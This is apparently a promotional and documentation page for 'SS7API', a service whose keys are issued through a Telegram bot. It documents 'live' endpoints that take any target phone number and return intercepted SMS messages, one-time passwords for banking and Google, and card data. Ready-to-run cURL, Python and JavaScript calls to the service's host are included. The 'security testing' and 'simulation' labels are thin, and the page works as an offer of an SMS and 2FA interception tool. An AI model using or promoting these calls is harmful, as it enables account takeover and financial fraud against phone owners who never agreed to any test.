API Status: Operational

Telecom Security API

Professional SS7 protocol testing API for security researchers and telecom engineers. Simulate SMS interception, OTP capture, Visa/Mastercard data exposure, and identify vulnerabilities.

Get API Key Try API Now

Need an API Key?

Get your free API key instantly on Telegram

@ss7api_bot

API Documentation

Complete reference for the SS7API telecom security testing platform

SS7 Protocol Testing

Test MAP, CAP, SCCP vulnerabilities in telecom networks

Card Data Exposure NEW

Visa/Mastercard simulation with Luhn validation and realistic card numbers

OTP Interception NEW

Capture financial & verification OTPs from SMS traffic

API Endpoints

Everything you need to integrate SS7 testing

Base URL
https://api.ss7api.com/v1
POST /live/capture OTP + CARD

Simulate SS7 SMS interception on a target phone number. Returns captured messages, OTPs, and card data with vulnerability analysis.

{
  "target": "+1234567890",
  "duration": 30,
  "protocol": "MAPv3",
  "capture_type": "all"
}
{
  "status": "success",
  "test_id": "TEST_8X9K2M4N",
  "summary": {
    "otps_captured": 2,
    "cards_exposed": 1,
    "risk_score": 85,
    "risk_level": "Critical"
  },
  "vulnerabilities": [
    {"type": "SMS_Interception", "severity": "Critical"},
    {"type": "Financial_OTP_Interception", "severity": "Critical"}
  ]
}
POST /live/card VISA/MC

Simulate card data exposure via SS7. Returns realistic Visa/Mastercard numbers with Luhn validation.

{
  "cards_exposed": 2,
  "cards": [
    {
      "card_type": "VISA",
      "card_number": "4111111111111111",
      "masked": "4111****1111",
      "expiry": "12/26",
      "cvv": "123",
      "bank": "City Bank"
    }
  ]
}
POST /live/otp 2FA OTP

Simulate OTP interception only. Returns verification codes, financial OTPs, and bank alerts.

{
  "otps_captured": 3,
  "otps": [
    {"otp": "482951", "type": "financial", "merchant": "Daraz"},
    {"otp": "372849", "type": "verification", "service": "Google"}
  ]
}
GET /key/validate

Validate your API key and check remaining rate limits.

{
  "status": "success",
  "api_key": "ss7api_****...",
  "plan": "prime",
  "rate_limit": "1000/day",
  "expires": "2025-12-31",
  "valid": true
}

Code Examples

Quick start guides for popular languages

cURL

curl -X POST https://api.ss7api.com/v1/live/capture \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "target": "+1234567890",
    "duration": 30
  }'

Python

import requests

url = "https://api.ss7api.com/v1/live/capture"
headers = {"Authorization": "Bearer YOUR_API_KEY"}
data = {"target": "+1234567890", "duration": 30}
response = requests.post(url, json=data, headers=headers)
print(response.json())

JavaScript

const axios = require('axios');

axios.post('https://api.ss7api.com/v1/live/capture', {
    target: '+1234567890',
    duration: 30
}, {
    headers: { 'Authorization': 'Bearer YOUR_API_KEY' }
}).then(res => console.log(res.data));